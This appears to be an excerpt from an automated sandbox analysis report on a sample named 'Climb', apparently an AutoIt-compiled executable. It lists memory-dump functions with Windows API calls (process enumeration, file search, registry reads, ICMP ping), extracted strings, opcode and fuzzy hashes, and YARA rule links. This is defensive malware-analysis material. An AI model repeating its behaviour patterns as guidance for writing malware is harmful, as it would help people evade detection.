Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 24347bffbe349ca0e3c4744a172085f322801aa231b116dec8cee091a306417f
Instruction ID: c99a10d56559765fe894c75bbdc2bb38c13a03f9b0cf466b582d39cd2f9b49ae
Opcode Fuzzy Hash: 24347bffbe349ca0e3c4744a172085f322801aa231b116dec8cee091a306417f
Instruction Fuzzy Hash: 993172320083499BC310EB60C8558BFBBF8BE96305F404D1EF9D692191DB25DA0DC7A7

Function 0055DD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0055DDAC
Process32FirstW.KERNEL32(00000000,?), ref: 0055DDBA
Process32NextW.KERNEL32(00000000,?), ref: 0055DDDA
CloseHandle.KERNEL32(00000000), ref: 0055DE87

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: c2201003c971799cd7c0a33ba0cb414ef13a8eee98478d519767f3cad2092990
Instruction ID: fda5e08576234d4cc7907ff5476a8784c0efc3a752b164009cecbb3335810efb
Opcode Fuzzy Hash: c2201003c971799cd7c0a33ba0cb414ef13a8eee98478d519767f3cad2092990
Instruction Fuzzy Hash: 5B3170720082059FD310EF50D895AAEBBF8FF95354F14092EF981861A1DB719949CBA2

Function 0050AC3E Relevance: 37.4, APIs: 1, Strings: 20, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tX, xrefs: 0050ADCC
e#\, xrefs: 0050AFA9
(\, xrefs: 0050AD4D
@X, xrefs: 0050ADED
d0b, xrefs: 0050AC96, 0050AD10, 0050AEA7
`X, xrefs: 0050ADE2
tX, xrefs: 0050AD35
X, xrefs: 0050AD8A
(\, xrefs: 0050ADD7
i, xrefs: 0050B0A3
d1b, xrefs: 0050AD55, 0050AE8E
(\, xrefs: 0050ADC1
PX, xrefs: 0050AD3D
X, xrefs: 0050AD74
d1r0,2, xrefs: 0050ACA9
4X, xrefs: 0050AD45
(\, xrefs: 0050AD65
d5m0, xrefs: 0050AE75
`*\, xrefs: 0050AFF9
d10m0, xrefs: 0050ACF0

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID:
String ID: 4X$@X$PX$`*\$`X$d0b$d10m0$d1b$d1r0,2$d5m0$e#\$i$tX$tX$(\$(\$(\$(\$X$X
API String ID: 0-1933161890
Opcode ID: bdac998d50e3c15e7335c2c6fb17672b49c42b5e7a880f17470877240bd9408b
Instruction ID: 5e27c70862dd2482304411e4132d63e9c2719c63da186ae8d5add64f9d9b9a47
Opcode Fuzzy Hash: bdac998d50e3c15e7335c2c6fb17672b49c42b5e7a880f17470877240bd9408b
Instruction Fuzzy Hash: 2A6255705083458FD328DF15C095AAEBBF1BF89308F10895EE8999B391DB71E949CF92

Function 004F3624 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 004F3657
RegisterClassExW.USER32(00000030), ref: 004F3681
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004F3692
InitCommonControlsEx.COMCTL32(?), ref: 004F36AF
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004F36BF
LoadIconW.USER32(000000A9), ref: 004F36D5
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004F36E4

Strings

+, xrefs: 004F3640
0+m"O, xrefs: 004F366C
TaskbarCreated, xrefs: 004F3687
0, xrefs: 004F3639
AutoIt v3 GUI, xrefs: 004F3673

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$0+m"O$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-2590276412
Opcode ID: 2b3db5de09b9585c5d771cb621e281ac3f1f79358202d569005be55ad4062792
Instruction ID: 0022feadc005b286763d3eb66d33fbb4a4582061566019b9840d87dd138d45e9
Opcode Fuzzy Hash: 2b3db5de09b9585c5d771cb621e281ac3f1f79358202d569005be55ad4062792
Instruction Fuzzy Hash: 5421E5B1D01308AFDB00DF94EC89B9DBBF4FB18B10F10511AF911B62A0D7B54588AFA0

Function 004F370F Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,004F3709,?,?), ref: 004F3777
KillTimer.USER32(?,00000001,?,?,?,?,?,004F3709,?,?), ref: 004F37A3
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004F37C6
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,004F3709,?,?), ref: 004F37D1
CreatePopupMenu.USER32 ref: 004F37E5
PostQuitMessage.USER32(00000000), ref: 004F3806

Strings

0$\, xrefs: 00533DF7
TaskbarCreated, xrefs: 004F37CC
0$\, xrefs: 00533DA9

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: 0$\$0$\$TaskbarCreated
API String ID: 129472671-3681040219
Opcode ID: e158e4714528ed1a2e4980a203e9fa38f57b988d12bb71f1657bfc7238392689
Instruction ID: f0d6b16b1e528984a95adec835a22cae2e0f55f3bca047349f05a9b0439cfeac
Opcode Fuzzy Hash: e158e4714528ed1a2e4980a203e9fa38f57b988d12bb71f1657bfc7238392689
Instruction Fuzzy Hash: F241C3F010458DBEDB143F688C49F7A3FE5F750302F00812BFA0695290CABC9B49A76A

Function 005309DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0053071A: CreateFileW.KERNEL32(00000000,00000000,?,00530A84,?,?,00000000,?,00530A84,00000000,0000000C), ref: 00530737

GetLastError.KERNEL32 ref: 00530AEF
__dosmaperr.LIBCMT ref: 00530AF6
GetFileType.KERNEL32(00000000), ref: 00530B02
GetLastError.KERNEL32 ref: 00530B0C
__dosmaperr.LIBCMT ref: 00530B15
CloseHandle.KERNEL32(00000000), ref: 00530B35
CloseHandle.KERNEL32(?), ref: 00530C7F
GetLastError.KERNEL32 ref: 00530CB1
__dosmaperr.LIBCMT ref: 00530CB8

Strings

H, xrefs: 00530C3D

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: d9e401d98317686e878e364a3f3818a0cc772b980a9f3b6ab971b1e60d184ef4
Instruction ID: 43df02b1845731f75ef91ca420c93c644ce1abe672bf4d1fd4557f71be468065
Opcode Fuzzy Hash: d9e401d98317686e878e364a3f3818a0cc772b980a9f3b6ab971b1e60d184ef4
Instruction Fuzzy Hash: 95A12532A046098FDF18AF68D865BAD7FA0BF46324F141159F811AB2D1DB319C16CB65

Function 004F52A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004F5594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00534B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 004F55B2

Part of subcall function 004F5238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 004F525A

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004F53C4
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00534BFD
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00534C3E
RegCloseKey.ADVAPI32(?), ref: 00534C80
_wcslen.LIBCMT ref: 00534CE7
_wcslen.LIBCMT ref: 00534CF6

Strings

\, xrefs: 00534CFC
\Include\, xrefs: 004F5381
Include, xrefs: 00534BF4, 00534C35
Software\AutoIt v3\AutoIt, xrefs: 004F53BA

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: ae35e64224f7d34e6fa5fa7fa616a408300a3bdbf0c934e3d8866967fb4eb350
Instruction ID: 9119ff7638b2d3222242c67fe4fa439d14d5b13831d62b072da524cc0d6e68f7
Opcode Fuzzy Hash: ae35e64224f7d34e6fa5fa7fa616a408300a3bdbf0c934e3d8866967fb4eb350
Instruction Fuzzy Hash: 1B71BE71004309AEC704EF65EC85DABBBF8FFA8744F40882EF540931A0DB759A48CB96

Function 004F34D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 004F34DE
LoadCursorW.USER32(00000000,00007F00), ref: 004F34ED
LoadIconW.USER32(00000063), ref: 004F3503
LoadIconW.USER32(000000A4), ref: 004F3515
LoadIconW.USER32(000000A2), ref: 004F3527
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 004F353F
RegisterClassExW.USER32(?), ref: 004F3590

Part of subcall function 004F3624: GetSysColorBrush.USER32(0000000F), ref: 004F3657
Part of subcall function 004F3624: RegisterClassExW.USER32(00000030), ref: 004F3681
Part of subcall function 004F3624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004F3692
Part of subcall function 004F3624: InitCommonControlsEx.COMCTL32(?), ref: 004F36AF
Part of subcall function 004F3624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004F36BF
Part of subcall function 004F3624: LoadIconW.USER32(000000A9), ref: 004F36D5
Part of subcall function 004F3624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004F36E4

Strings

0, xrefs: 004F355F
#, xrefs: 004F3566
AutoIt v3, xrefs: 004F357F

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 820e74b36a2104c0eaebef8acd5ad3612e4cf9732fd604553ce8e6c766772e34
Instruction ID: bda0c98352d212acb883b156110f2909ae46fb080bddf8f1be6b2db5be260fbe
Opcode Fuzzy Hash: 820e74b36a2104c0eaebef8acd5ad3612e4cf9732fd604553ce8e6c766772e34
Instruction Fuzzy Hash: 6D213A70D00798AFDB109FA5EC55FA9BFF4FB18B50F00442AEA04B62A0D7B94548AF94

Function 00570FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000101,?), ref: 00571019
inet_addr.WSOCK32(?), ref: 00571079
gethostbyname.WS2_32(?), ref: 00571085
IcmpCreateFile.IPHLPAPI ref: 00571093
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00571123
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00571142
IcmpCloseHandle.IPHLPAPI(?), ref: 00571216
WSACleanup.WSOCK32 ref: 0057121C

Strings

Ping, xrefs: 005710D3

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 6c3cfefa817eeacbb808dd7f57c0fac7e13c4a44f82cc2907a92eb5dcfd9be33
Instruction ID: 6aec3f84ce42208a97758e5e7b92b8e12301f05c4103472b703e746b6a8816bf
Opcode Fuzzy Hash: 6c3cfefa817eeacbb808dd7f57c0fac7e13c4a44f82cc2907a92eb5dcfd9be33
Instruction Fuzzy Hash: CE91CE30604601AFD720DF29D888F26BFE0BF44318F14C9A9E5698F6A2C730ED85DB85

Function 004FF6D0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 005448C6
t5\, xrefs: 004FF8E0
t5\, xrefs: 005445E9
t5\t5\, xrefs: 004FF97E
t5\, xrefs: 0054463C
t5\, xrefs: 004FFBB1

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.$t5\$t5\$t5\$t5\$t5\t5\
API String ID: 0-3632540058
Opcode ID: 04127c692c6de97e7d0d160599f7f687ace59fd9e463817f27bcdf6cc96f9a30
Instruction ID: 3255eb997d3e3e37f410a3ca6056a0a39708cba3a28a19704972d5939711fd82
Opcode Fuzzy Hash: 04127c692c6de97e7d0d160599f7f687ace59fd9e463817f27bcdf6cc96f9a30
Instruction Fuzzy Hash: 49C29E71E00209DFCB20DF58C884BBEBBB1BF45314F24816AEA05AB391E379AD45CB55

Function 00500340 Relevance: 15.2, APIs: 3, Strings: 5, Instructions: 1236COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 005015F2

Strings

t5\, xrefs: 0054604D
t5\, xrefs: 00545FF9
t5\, xrefs: 005006B7
t5\, xrefs: 00500A6A
t5\t5\, xrefs: 0050075B

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Init_thread_footer
String ID: t5\$t5\$t5\$t5\$t5\t5\
API String ID: 1385522511-1249404307
Opcode ID: e39d84d9cd860c574d783afb4130f493aeb083ae624296fd45037fd29981ee37
Instruction ID: 82115712cdf7b134598a7692d8845e3e4965043dd1440136d9e3822150bbb73a
Opcode Fuzzy Hash: e39d84d9cd860c574d783afb4130f493aeb083ae624296fd45037fd29981ee37
Instruction Fuzzy Hash: CDB25674A08741CFDB24CF18C480B6EBBE1BB99304F14995DE9898B3D2D771E985CB92

Function 004F2793 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 153
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004F327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 004F32AF
Part of subcall function 004F327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 004F32B7
Part of subcall function 004F327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004F32C2
Part of subcall function 004F327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004F32CD
Part of subcall function 004F327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 004F32D5
Part of subcall function 004F327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 004F32DD

Part of subcall function 004F3205: RegisterWindowMessageW.USER32(00000004,?,004F2964), ref: 004F325D

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 004F2A0A
OleInitialize.OLE32 ref: 004F2A28
CloseHandle.KERNEL32(00000000,00000000), ref: 00533A0D

Strings

0$\, xrefs: 004F2A2E
4'\, xrefs: 004F2948
d(\, xrefs: 004F2964
(&\, xrefs: 004F2932
$\, xrefs: 004F280A

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: (&\$0$\$4'\$d(\$$\
API String ID: 1986988660-501023031
Opcode ID: 341958b1f67558cc2f5fe2ace2574cf5c44f9985bc934d1d228ea961eff5452b
Instruction ID: 84a12c0b38c410b1ce7c1d1336d30f6ee8ae2eaa7d6646a70a00d509aef50bf9
Opcode Fuzzy Hash: 341958b1f67558cc2f5fe2ace2574cf5c44f9985bc934d1d228ea961eff5452b
Instruction Fuzzy Hash: 8971A2B0901B058F8788EF6AEDA5E263BF0F768304F50512ED508DB361EBB44449EF68

Function 005290C5 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c269a1951d6db80144ef9b2c09e0716aab183b9ee60f3138bf5e174a061723b2
Instruction ID: a7f1f029190def3f14aaf4cfd199ae2ef099c524a33f92b3a35b804c04bf7263
Opcode Fuzzy Hash: c269a1951d6db80144ef9b2c09e0716aab183b9ee60f3138bf5e174a061723b2
Instruction Fuzzy Hash: AAC1DFB090426AAFDF11EFA8E845BADBFB0BF5A310F140459E815A73D2C7309D42CB61

Function 004F35B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004F35E1
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 004F3602
ShowWindow.USER32(00000000,?,?,?,?,?,?,004F3368,?), ref: 004F3616
ShowWindow.USER32(00000000,?,?,?,?,?,?,004F3368,?), ref: 004F361F

Strings

AutoIt v3, xrefs: 004F35D9, 004F35DE, 004F35DF
edit, xrefs: 004F35FC

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: ed58d212741a37adfa977babd5a05561b01dd47ed09b642ea2cbc95054499d3a
Instruction ID: 40f8e049980bcfbbb3b326e329f3d0e56f4884d4e4506f4b31c4d01e0f35990f
Opcode Fuzzy Hash: ed58d212741a37adfa977babd5a05561b01dd47ed09b642ea2cbc95054499d3a
Instruction Fuzzy Hash: 23F0B7716406D47EEB2157176C48E372FBDE7D6F50F10042EBD04A61A0D6691859EAB0

Function 004F61A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00535287

Part of subcall function 004F8577: _wcslen.LIBCMT ref: 004F858A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 004F6299

Strings

AutoIt - , xrefs: 004F620D
Line %d: , xrefs: 00535305

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line %d: $AutoIt -
API String ID: 2289894680-4094128768
Opcode ID: 72fe14ba340a939e0a6c1701df76b53244b27a4882f61f639edd53bf73ed0bc8
Instruction ID: 22d3cf6d03280a7c8eb8773d2eb6867bb9cfa2ed136d6304a0ff866c7fad9395
Opcode Fuzzy Hash: 72fe14ba340a939e0a6c1701df76b53244b27a4882f61f639edd53bf73ed0bc8
Instruction Fuzzy Hash: 4D41B4714083086EC310EB21DC45EEF7BE8AF95714F014A1FFA85920A2EF789649C796

Function 00528A2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNEL32(00000000,00000000,?,OVS,0052894C,?,005B9CE8,0000000C,005289AB,?,OVS,?,0053564F), ref: 00528A84
